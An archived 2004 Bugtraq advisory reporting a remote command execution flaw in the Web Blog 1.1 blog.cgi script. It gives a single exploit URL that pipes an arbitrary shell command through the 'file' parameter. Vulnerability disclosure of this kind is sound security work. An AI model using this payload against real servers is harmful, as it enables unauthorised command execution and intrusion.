[33329] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Web Blog 1.1 Remote Execute Commands Bug

daemon@ATHENA.MIT.EDU (ActualMInd)
Mon Feb 2 22:49:01 2004

Message-ID: <40197006.6090007@liberdadeaffix.org>
Date: Thu, 29 Jan 2004 23:41:42 +0300
From: ActualMInd <actualmind@liberdadeaffix.org>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Product:
Web Blog 1.1 Remote Execute Commands Bug

Affected Versions:
1.1.5

Bug:
Command Remote Execution

Credits:
n3rd - Lit Security Solutions (LiSS)
#Affix in irc.brasnet.org

Vendor:
http://leifwright.com

Exploiting:
http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command|


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[33329] in bugtraq

Web Blog 1.1 Remote Execute Commands Bug

daemon@ATHENA.MIT.EDU (ActualMInd)Mon Feb 2 22:49:01 2004

daemon@ATHENA.MIT.EDU (ActualMInd)
Mon Feb 2 22:49:01 2004